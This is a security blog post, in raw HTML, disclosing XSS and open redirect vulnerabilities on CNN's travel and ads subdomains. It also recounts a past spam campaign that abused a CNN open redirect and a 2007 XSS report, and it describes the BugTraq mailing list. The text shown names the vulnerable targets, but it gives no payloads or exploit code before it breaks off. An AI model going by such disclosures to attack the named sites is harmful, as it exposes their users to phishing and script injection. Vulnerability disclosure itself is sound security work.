<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTXvX6oM9FLhvzhOoQMs8sx9No0v6R-2v_0KZ4hzESdkzr_QTIqjIBIfy5X1sr4bBAvVQ7YNqwCUQrDi6f47H-71bs-oxT2rMFDXUZ18xueKA8WNFKsddY1kCfDGzbkEHuriGyq2w7N8/s1600/cnn_travel_xss.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTXvX6oM9FLhvzhOoQMs8sx9No0v6R-2v_0KZ4hzESdkzr_QTIqjIBIfy5X1sr4bBAvVQ7YNqwCUQrDi6f47H-71bs-oxT2rMFDXUZ18xueKA8WNFKsddY1kCfDGzbkEHuriGyq2w7N8/s400/cnn_travel_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://cnn.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"The Cable News Network (CNN) is an American basic cable and satellite television channel that is owned by the Turner Broadcasting System division of Time Warner. The 24-hour cable news channel was founded in 1980 by American media proprietor Ted Turner. Upon its launch, CNN was the first television channel to provide 24-hour news coverage, and was the first all-news television channel in the United States. While the news channel has numerous affiliates, CNN primarily broadcasts from the Time Warner Center in New York City, and studios in Washington, D.C. and Los Angeles, its headquarters at the CNN Center in Atlanta is only used for weekend programming. CNN is sometimes referred to as CNN/U.S. to distinguish the American channel from its international sister network, CNN International. As of August 2010, CNN is available in over 100 million U.S. households. Broadcast coverage of the U.S. channel extends to over 890,000 American hotel rooms, as well as carriage on cable and satellite providers throughout Canada. Globally, CNN programming airs through CNN International, which can be seen by viewers in over 212 countries and territories. As of February 2015, CNN is available to approximately 96,289,000 cable, satellite and, telco television households (82.7% of households with at least one television set) in the United States." (Wikipedia)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" />Discovered and Reported by:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/549420227021115392">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></div>
</div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CNN has a cyber security bug problem. It cab be exploited by XSS (Cross Site Scripting) and Open Redirect (Unvalidated Redirects and Forwards) attacks.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Based on news published, CNN users were hacked based on both Open Redirect and XSS vulnerabilities.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to E Hacker News on June 06, 2013, (@BreakTheSec) came across a diet spam campaign that leverages the open redirect vulnerability in one of the top News organization CNN.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">After the attack, CNN takes measures to detect Open Redirect vulnerabilities. The measure is quite good during the tests. Almost no links are vulnerable to Open Redirect attack on CNN's website, now. It takes long time to find a new Open Redirect vulnerability that is un-patched on its website.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CNN.com was hacked by Open Redirect in 2013. While the XSS attacks happened in 2007.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><1></b> "The tweet apparently shows cyber criminals managed to leverage the open redirect security flaw in the CNN to redirect twitter users to the Diet spam websites."</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHiqxMStMQBPNNoZFwPryqWn1mSDL13rriGegYZCicobbwcN6KUEondvLrsN11L66hxnlo0LN3KIS65E2Qy79GBs82Lhpya6vN_46xIFYcMl3sO1sYJsVDORZxMgl7WEEv5PajehO1ndU/s1600/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHiqxMStMQBPNNoZFwPryqWn1mSDL13rriGegYZCicobbwcN6KUEondvLrsN11L66hxnlo0LN3KIS65E2Qy79GBs82Lhpya6vN_46xIFYcMl3sO1sYJsVDORZxMgl7WEEv5PajehO1ndU/s400/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" style="cursor: move;" width="400" /></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Figure from ehackingnews.com</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">At the same time, the cybercriminals have also leveraged a similar vulnerability in a Yahoo domain to trick users into thinking that the links point to a trusted website.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Yahoo Open Redirects Vulnerabilities:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><2></b> CNN.com XSS hacked</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2007/Aug/216" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2007/Aug/216</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. CNN has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The below things be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the fllowing web securities have been published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories, solutions details related to XSS and URL Redirection vulnerabilities and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) CNN (cnn.com) Travel-City Related Links XSS (cross site scripting) Web Security Bugs</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">travel.cnn.com/</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
